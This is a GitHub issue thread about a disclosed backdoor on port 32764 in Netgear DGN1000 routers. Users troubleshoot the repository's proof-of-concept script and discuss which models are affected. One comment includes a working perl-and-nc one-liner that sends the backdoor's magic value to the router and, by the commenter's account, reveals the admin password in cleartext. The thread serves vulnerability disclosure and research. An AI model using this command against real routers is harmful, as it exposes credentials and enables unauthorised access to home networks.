DGN1000 #3

Closed
grigio opened this Issue Jan 2, 2014 · 6 comments

Projects

None yet

3 participants

@grigio
grigio commented Jan 2, 2014

Your script returns:

Traceback (most recent call last):
  File "backdoorolol.py", line 23, in <module>
    print send_message(s, 2, "http_password")[1]
  File "backdoorolol.py", line 11, in send_message
    sig, ret_val, ret_len = struct.unpack('<III', s.recv(0xC))
struct.error: unpack requires a string argument of length 12

Anyway with DGN1000 Netgear N150 and the script below I'm able to see the password in cleartext.

perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.1.1 32764

I tried also over internet (with or without remote administration enabled) and it doesn't work, so it seems just a local LAN exploit.

@elvanderb
Owner

I should have add a little loop and check the length of the returned string :)
I'll update the script. Thank you for reporting the issue.

@elvanderb elvanderb closed this Jan 2, 2014
@teetaucher

I'm not sure if there is any difference to the device reported above, but the backdoor is also present in the "Netgear N150 DGN1000B".

By the way: Nice Work! Perhaps could you give some more information about the tools you used?

@elvanderb
Owner

Thank you I updated the README :)
I just used nmap, google, binwalk, IDA and a patched version of squashfs tools :)

@grigio
grigio commented Jan 3, 2014

@elvanderb I forgot to ask, do you raccommed other alternative firmwares without this exploit? I tried to look at pfsense and openwrt and it seems this router isn't supported

@elvanderb
Owner

No, sorry :)

@teetaucher

Update: The DGN1000B is the firmware for countries which use Annex B (eg. Germany) for DSL.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment